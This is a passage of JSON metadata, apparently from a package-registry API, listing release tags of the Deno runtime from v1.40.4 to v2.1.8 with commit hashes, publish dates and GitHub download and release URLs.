gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":nul